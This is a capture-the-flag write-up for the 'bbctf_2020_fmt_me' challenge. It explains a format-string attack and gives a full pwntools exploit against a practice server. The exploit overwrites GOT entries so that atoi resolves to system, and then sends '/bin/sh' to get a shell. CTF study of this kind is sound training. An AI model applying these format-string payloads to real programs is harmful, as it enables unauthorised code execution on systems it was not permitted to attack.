bbctf_2020_fmt_me
<h1>Analysis</h1>
<p><img src="https://pic.imgdb.cn/item/63ad8b6c08b6830163dd4df3.png" alt="" /> </p>
<p>There is only one format string vulnerability, and it is triggered only once, but the binary links the system function. So the plan is to overwrite system@got with the address of main, then overwrite the GOT entry of the atoi call in get_init() with system@plt[1], which skips the jump through system@got and instead resolves system's real address directly and executes it.</p>
<p><img src="https://pic.imgdb.cn/item/63ad8c3908b6830163de9abc.png" alt="" /> </p>
<p>Then, when fgets reads input, supplying "/bin/sh" yields a shell.</p>
<h1>Exploit</h1>
<pre><code>from pwn import *

# o = process('./pwn')
o = remote('node4.buuoj.cn', 25732)

system_got = 0x404028
system_plt = 0x401056   # system@plt[1]: skips the GOT jump and goes straight to the resolver
atoi_got = 0x404058
main = 0x4011F7

o.sendline(b'2')

# Three sequential %n writes; each value is the number of characters printed so far:
#   %16$n -> atoi_got+4   receives 0            (clear the upper dword)
#   %17$n -> atoi_got     receives 4198486      (0x401056 = system_plt)
#   %18$n -> system_got   receives 4198486+417  (0x4011F7 = main)
payload = b"%16$n"
payload += b"%4198486p" + b"%17$n" + b"%417p" + b"%18$n"
# Pad to 0x50 so the three target pointers land at positional arguments 16, 17 and 18.
payload = payload.ljust(0x50, b'a')
payload += p64(atoi_got + 4) + p64(atoi_got) + p64(system_got)
# pause()
o.sendline(payload)
o.interactive()
</code></pre>